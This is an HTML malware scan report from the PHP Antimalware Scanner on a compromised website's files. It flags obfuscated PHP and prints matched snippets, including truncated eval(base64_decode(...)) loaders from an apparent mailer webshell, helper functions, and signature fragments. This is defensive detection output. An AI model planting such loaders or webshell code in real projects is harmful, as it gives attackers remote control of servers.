<!DOCTYPE html>
<html lang="en">
<head>
<meta charset='utf-8'>
<meta http-equiv='X-UA-Compatible' content='IE=edge'>
<title>Scan Report</title>
<link rel="icon" type="image/png" sizes="16x16" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAACxMAAAsTAQCanBgAAAMoSURBVDhPZVPfaxxVFP7u/Mjszsya7KbbRNJ00xehWLCbQvGlfWj/gj4oCHlQH1aEin+Czz7mQdBiiiColD7oi1ow26gVKmqChobmRzXRupWku7PJ7M7s3J+eGVREL3PnXoY553zn+77D8J919eMvmsaYltH6ktZ6TisF2rtaqrbW6tp7Lz239tevxfonwWufLPvGYFEr+fLjbs/qHR4iHgxheS4qlQCh46JsOxpKXVdKvf7R1ReTPM7OX1TVh8FncRxfWb+/xRJmoXpqDokw8CYnEcxMg40HGKmMIR3NG6kuzM2fv7H9dVtYeQKCu0jBF3/a2oEuh2CVCUT9AeCOwQkD+LUqJk7OYvqZMyg9NQuh+cVsEC/msezVm583jTY/rK7fY6rkw6lOAjwDY9Sd7WBydgr1E3X4T/gIxym54uh8+x067btGpKNzFhHV2j84YBkR4IYV2JKDUWVjUXdSwC95ODtdR3WigkrgoeaNIfpxFQc795nkWcsidi93H/fguB6CSohjT06BaQWivmhhLCih79ko8RQbH97Eu88vYOWtt/Hw3jpkll12lBSNJCVC/RA8TWFy2dIhtOUSw4RKpFh9/wNs3P4Sw24X0cY6FBcUrCA4b1hKylxnKCGQ9A9xuH8APhxCxEdIOg9x550lrN1aQf/3PxBtbhLhBsym9iwLWnBQArHnOQ5UNiq2HBzRyYuTkxcU4RhFEZJHvxWuYdRqfvGCEJKLPSvt9ZZLzEAM4iKjJiSKTn7Ux7Czh/jnLbpHcMdrsIgTy3ULBEHtGCGXy/apc892ILLWo+1NlnQJfpIR9D2M6C6pFfIIPN9H5Xi9UCYvZOfyzpw0MOYV69M331hTnC/NTE8R7AFEtE8KGHIXPSQtGQJOuYz66adJVknVc280cg8tba7cWius3Jg/v8xgLpQdpxFHPchcDWrDkCcMBYlhjOjBNhR9r9aPY8wrfUXQFnq//iKKBLvf3xUnzjRvEEdTYbl0linJ/ibVECe20SgReePVmrZse4mwLTz45nYxTP8b5+aVF5payhbJe4lOGudC5l1ybJuqXtu50/7XOAN/Ar01xcqF8C92AAAAAElFTkSuQmCC" />
<meta name='viewport' content='width=device-width, initial-scale=1'>
<!-- JQuery -->
<script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.4/jquery.min.js" crossorigin="anonymous"></script>
<!-- Bootstrap -->
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/5.2.3/css/bootstrap.min.css" crossorigin="anonymous">
<script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/2.11.6/umd/popper.min.js" crossorigin="anonymous"></script>
<script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/5.2.3/js/bootstrap.min.js" crossorigin="anonymous"></script>
<!-- Font Awesome -->
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.8.2/css/all.css" crossorigin="anonymous">
<!-- Google Fonts -->
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,700&display=swap">
<!-- MDB -->
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/mdbootstrap/4.20.0/css/mdb.min.css">
<script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/mdbootstrap/4.20.0/js/mdb.min.js"></script>
<!-- Datatables -->
<link rel="stylesheet" href="https://cdn.datatables.net/1.10.23/css/dataTables.bootstrap4.min.css" crossorigin="anonymous">
<script type="text/javascript" src="https://cdn.datatables.net/1.10.23/js/jquery.dataTables.min.js" crossorigin="anonymous"></script>
<script type="text/javascript" src="https://cdn.datatables.net/1.10.23/js/dataTables.bootstrap4.min.js" crossorigin="anonymous"></script>
<style type="text/css">
body{padding-top:3.7rem;overflow-x:hidden}.table code{overflow-wrap:break-word;word-break:break-word;hyphens:auto}.table>tbody>tr>th{vertical-align:middle}.table>tbody>tr>td p{line-height:100%}#report>tbody>tr>td table td+td{width:50%}#report>tbody>tr{cursor:pointer}#report .dataTables_wrapper{cursor:auto}.dataTables_wrapper{margin-top:1rem}.badge-fileinfo{color:#222!important;background-color:rgba(0,0,0,.05)!important}.pagination .page-item.active .page-link{border-radius:100%;width:35px;height:35px;text-align:center;line-height:35px;padding:0}#back-top{display:none;position:fixed;bottom:20px;border-radius:100%;right:30px;z-index:99;border:none;outline:0;color:#fff;cursor:pointer;vertical-align:middle;padding:0;line-height:50px;font-size:18px;height:50px;width:50px}#back-top:hover{background-color:#555!important}
</style>
<script type="text/javascript">
function expandAll(){$("#report .dataTables_wrapper").show()}function collapseAll(){$("#report .dataTables_wrapper").hide()}function scrollToTop(){document.body.scrollTop=0,document.documentElement.scrollTop=0}!function(o){o(function(){o("#report tr").click(function(t){o(this).find("#report tr table, .dataTables_wrapper").toggle()}),o("#report tr table, #report .dataTables_wrapper").click(function(o){o.stopPropagation()}),window.onscroll=function(){document.body.scrollTop>20||document.documentElement.scrollTop>20?o("#back-top").show():o("#back-top").hide()}})}(jQuery);
</script>
</head>
<body>
<nav class="navbar navbar-dark bg-dark fixed-top">
<div class="container-fluid">
<span class="navbar-brand">
<a href="https://github.com/marcocesarato/PHP-Antimalware-Scanner" class="text-white" target="_blank">
<i class="fab fa-github mr-3"></i>
PHP Antimalware Scanner
</a>
</span>
<span>
<button class="btn btn-sm btn-primary rounded-pill" onclick="expandAll()"><i class="fas fa-expand mr-3"></i> Expand All</button>
<button class="btn btn-sm btn-danger rounded-pill" onclick="collapseAll()"><i class="fas fa-compress mr-3"></i> Collapse All</button>
<a href="https://github.com/marcocesarato/PHP-Antimalware-Scanner" target="_blank">
<button class="btn btn-sm btn-secondary rounded-pill"><i class="fab fa-github mr-3"></i> Github</button>
</a>
</span>
</div>
</nav>
<div class="jumbotron p-3 text-white bg-secondary">
<div class="container">
<h1 class="display-3">Report</h1>
<p>
<b>Version:</b> 0.10.4<br>
<b>Scan date:</b> 2026-06-17 17:35:57<br>
<b>Files analyzed:</b> 4468 <b>| Files infected:</b> 1782
</p>
</div>
</div>
<div class="container">
<table id="report" class="datatable container table table-bordered"><tbody><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/qkgjg.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 26.20 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2025-02-24 03:40:06</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-02-04 16:45:58</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 13</span><br><table id="file_0" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ingfo</span><span style="color: #007700">; } </span><span style="color: #0000BB">?></span> </div> </body> </html></span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1483</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">statusnya</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1561</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ingfo</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 751</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #DD0000">");</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 765</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">author</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 785</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">cekdir</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 799</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<span class='writable'>writable</span>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 803</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<span class='readonly'>readonly</span>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 811</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">cekroot</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 827</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">xrmdir</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 859</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">green</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 867</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">red</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 891</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_0").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/jmlxk.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 216.49 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-31 20:53:30</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-31 20:53:30</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 21</span><br><table id="file_1" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICAgfQogICAgZWxzZSB7CiA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit eval_base64 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval (</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval (</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval (</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 085a0329 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 085a0329)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">iYXNlNj</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 0f37c730 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 0f37c730)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">mdW5jdGlvb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 162cf671 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 162cf671)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">hcnJheV</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 407651f7 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 407651f7)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">wcmludG</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 4a069524 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 4a069524)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">aW5jbHVkZ</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7186bb8d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7186bb8d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RfUE9TV</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7830f7a6 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7830f7a6)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">N0cl</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7f5d33bf <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7f5d33bf)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">JF9SRVFVRVNU</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 91535293 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 91535293)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">leGVjK</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">pbmNsdWRl</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign a408f408 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: a408f408)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">c3Rhd</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ae7830db <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ae7830db)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">YmFzZTY0</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d30fc49e <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d30fc49e)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">b3Blb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d97f004d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d97f004d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Z1bmN0aW9u</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign de12c454 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: de12c454)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">VjaG</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign e6546205 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: e6546205)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">kX1BPU1</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ee1cb326 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ee1cb326)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">9wZW</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ff4f5344 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ff4f5344)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">FycmF5X</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_1").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/ocxrh.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 52.73 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 18:55:00</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 18:55:00</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 14</span><br><table id="file_2" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'4tNCPdUMNHGp37TLg3k6pPY5CIf6KWFdMqFEChJKXgZbi1BELpXmoM6ztMvoPnWg4eQUvTkc3PmAcwmls4bLBEQTSX1ckJGas66NtmwXAaljK4uUMePcJnGVpTYHwRtF3uTXMQDYJ2O8umyGtGsMsdkHxFjTSqmY1beQbJ7x0Ls9WyJ6ASK9QrEzGTf7IdPIPre8mqhI9eodyFMNj9YGRJDn4CcfJ2kg2eIoDbWPphXTbRPGymWPdoz2ZTpl06XQOtLLx7gsxvK3Irk9BTH1PqIsFBobKuAAvoc0SoCKu93DeTNctdZDxvZmgGsswABEIsOaUOsA2MUKfu9SxAH8JNoIXBOCmP6yV9cgTI617pcLxXozLLp4CBgY6DKMgckypa8MEWDrpi0uDksDJcp9nY1MVP05l9w4HNHAr3s0crA8C0jhvHHHTYlLPxeNcFoVSCkMXiWORKVrbYrMaYRShWQq0pJFhNkC7vDJ1G0TBv51pj82gTS...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit eval_base64 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
